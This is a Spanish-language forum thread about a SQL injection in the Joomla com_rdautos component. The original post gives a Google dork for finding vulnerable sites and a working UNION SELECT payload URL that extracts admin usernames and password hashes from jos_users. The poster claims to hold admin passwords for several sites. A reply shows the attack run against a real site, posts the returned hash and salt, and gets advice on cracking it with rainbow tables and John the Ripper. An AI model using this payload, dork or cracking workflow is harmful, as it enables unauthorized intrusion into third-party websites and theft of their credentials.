Sql injection Joomla--- afecta componente com_rdautos

richi's picture

Hola amigos, estaba buscando bugs en joomla y encontre una interesante vulnerabilidad.....
es del componente com_rdautos, generalmente utilizada en compañias de automoviles y esas cosas.

bueno y como tambien estoy aprendiendo a realizar busquedas avanzadas en google pense que podia probarlo asi que en el buscador coloque el siguiente codigo

inurl:index.php?option=com_rdautos

y me aparecieron algunas paginas que utilizan este componente
procedi a la sql inyection y funciono todo a la perfeccion, tengo las claves de administrador de varios sitios.

Debo recalcar que no he ingresado ni nada a las paginas web, tampoco que me interesa cambiar el index... eso xq no se lo merecen y ademas xq a mi me lo han hecho 2 veces y no es bonito

pueden probarlo aqui el sql injection:

/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+from+jos_users--&Itemid=54

Con cuidado Muchacho jejeje

Fuente: http://www.packetstormsecurity.org/0901-exploits/joomlardautos-sql.txt

Saludos

Comment viewing options

Select your preferred way to display the comments and click "Save settings" to activate your changes.

Sobre claves de admin

Hola.

He seguido los pasos que indicas y en principio funciono pero como puedo probar si los datos obtenidos son funcionales y correctos?

Por ejemplo, una web me devolvio esto:

admin:
52547a4f1fad21ebaac2b78f6ceb78a3:HqGlivBxjeNnFI3kdJdKP4C53TqbZY47

Como podria probarlo?

richi's picture

MD5 sebpes

Hola, bueno primero si son funcionales y correctos los datos que te indican pues son las contraseñas del administrador

Antes que nada te diria que la contraseña esta encriptada en MD5 puedes leer informacion en la siguiente pagina:

http://es.wikipedia.org/wiki/MD5

Tambien que estudies mucho conceptos de hack, crack, sql, php, lenguajes de programacion, etc. asi entenderas todo los proyectos que emprendas y encuentres en la red.

OK continuemos jeje :P :P

52547a4f1fad21ebaac2b78f6ceb78a3-----> Esta es la contraseña funcional como tu la llamas jeje ;) ;)

Tienes que buscar un password cracker de md5
puedes usar tablas de rainbown que es son muy buenas para crackear hashes.

http://www.freerainbowtables.com/

Tambien puedes usar el john the ripper, muy buen cracker con soporte para GNU/LINUX y Uindou$.

http://www.openwall.com/john/

Busca por internet hermano, estudia mucho y respeta la informacion que encuentres....

Saludos y mucha suerte con tus proyectos sebpes :D :D :D :D :D :D

Saludos Comunidad.....

Md5 y Joomla

Richi, gracias por tus conceptos, pero creo que no hacía falta ser tan "Docente". Solo con que me guiaras era suficiente.

Te aseguro que leo todo lo que puedo.

Muchas Gracias.

richi's picture

Ok sebpes

Me alegra mucho que te valiera lo que te dije...
Y no queria parecer profesor pero bueno :P :P :P :P

Saludos Suerte...